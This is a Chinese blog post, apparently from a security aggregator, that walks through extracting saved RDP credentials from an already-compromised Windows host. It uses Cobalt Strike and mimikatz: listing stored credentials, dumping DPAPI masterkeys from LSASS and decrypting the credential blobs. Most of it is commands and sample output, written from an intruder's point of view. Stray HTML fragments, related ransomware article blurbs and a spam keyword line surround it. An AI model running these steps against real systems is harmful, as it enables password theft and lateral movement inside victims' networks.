<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    獲取遠程主機保存的RDP憑據密碼

    VSole2022-06-20 22:02:08

    拿下一臺運維機,上了個CS,發現曾經連接過幾臺服務器并且保存了憑據,網上查了圈發現CS不支持交互式mimikatz,記錄下獲取遠程主機RDP憑據。

    Windows保存RDP憑據的目錄是C:\Users\用戶名\AppData\Local\Microsoft\Credentials

    可通過命令行獲取,執行: cmdkey /listpowerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force

    注意:cmdkey /list命令務必在Session會話下執行,system下執行無結果。

    使用cobalt strike中的mimikatz可以獲取一部分接下來要用到的masterkey和pbData

    mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
    

    輸出應類似

    **BLOB**
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
    dwFlags            : 20000000 - 536870912 (system ; )
    dwDescriptionLen   : 00000012 - 18
    szDescription      : 本地憑據數據
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : 726d845b8a4eba29875****10659ec2d5e210a48f
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         : 
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : cda4760ed3fb1c7874****28973f5b5b403fe31f233
    dwDataLen          : 000000c0 - 192
    pbData             : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d
    dwSignLen          : 00000040 - 64
    pbSign             : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655
    

    需要關注的是guidMasterKey、pbData,pbData是我們要解密的數據,guidMasterKey是解密所需要的密鑰。這里LSASS已經在其緩存中存有這個key因此我們可以使用SeDebugPrivilege獲取。

    beacon> mimikatz !sekurlsa::dpapi  
    mimikatz !sekurlsa::dpapi 
         [00000001]
         * GUID      :    {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
         * Time      :    2020/1/3 8:05:02
         * MasterKey :    02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148
         * sha1(key) :    3e6dc57a0fe****a902cfaf617b1322
         [00000002]
         * GUID      :    {edcb491a-91d7-4d98-a714-8bc60254179f}
         * Time      :    2020/1/3 8:05:02
         * MasterKey :    c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202
         * sha1(key) :    5e1b3eb1152d3****6d3d6f90aaeb
    

    然后將憑據保存到本地,執行

    mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:對應的GUID key"
    

    軟件mimikatz
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Conti勒索軟件帝國竟然是建立在令人驚訝的低技術攻擊方法和技術之上。
    勒索軟件Cuba正利用微軟Exchange的漏洞進入企業網絡并對設備進行加密。知名網絡安全公司Mandiant追蹤到,使用該勒索軟件的團伙名為UNC2596,而勒索軟件本身的名字為COLDDRAW。其實,這個勒索軟件有一個更為人熟知的名字——Cuba,本文也將以這個名字引述它。
    此次感染迫使該公司在進行評估時關閉他們的管道作為預防措施,導致東海岸加油站排起長隊。PYSA于2019年12月首次被發現。DoppelPaymer至少自2019年7月以來一直存在,并且是BitPaymer勒索軟件家族的成員。考慮到教育部門最近多次成為攻擊目標,他們顯然不能免于勒索軟件攻擊。
    據澳大利亞和美國發布的最新聯合網絡安全咨詢報告,截至2023年10月,Play 勒索軟件背后的黑客影響了大約 300 個實體。
    透視 Phobos 勒索軟件的組織架構與攻擊行動
    萌新如何玩轉mimikatz
    2022-08-29 06:48:46
    暑假快到了,身邊好多師傅都開啟了"卷王"模式,而我也在南城師傅的幫助下開始了內網這個新征程;mimikatz就是我遇見的一個坎,我希望記錄下這個過程,盡可能的幫助大家更快的掌握mimikatz的用法和技巧。最后,再次謝謝南城師傅對本文的指導與幫助!!
    Malwarebytes威脅情報公司每月通過監控勒索軟件團伙在其暗網泄露網站上發布的信息來建立勒索軟件活動的圖景。這些信息代表的是那些成功被襲擊但選擇不支付贖金的受害者。
    2021年9月27日,以色列網絡安全企業Cybereason公司發布關于“PYSA”勒索軟件的威脅分析報告稱,“PYSA”勒索軟件可能針對政府組織、教育機構、醫療組織等重要行業目標進行攻擊。
    銀行業受到勒索軟件攻擊激增的“嚴重影響”,2021年所遭勒索軟件攻擊數量同比暴增1318%。 勒索軟件已成為現代企業最為普遍和臭名昭著的威脅之一。僅今年,我們就已見證數起重大勒索軟件感染事件,包括Colonial Pipeline、Kaseya和愛爾蘭醫療服務遭遇的那些,引發了從業務中斷到能源短缺、國家緊急狀態和醫療服務受限等一系列重大事故。
    聯邦調查局警告公司,一個自稱為 OnePercent 或 1Percent 的勒索軟件組織正在利用 IceID 木馬和 Cobalt Strike 后門在網絡中站穩腳跟。與許多其他知名勒索軟件組織一樣,OnePercent 既加密又竊取公司數據,威脅受害者如果不支付贖金就發布或拍賣信息。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类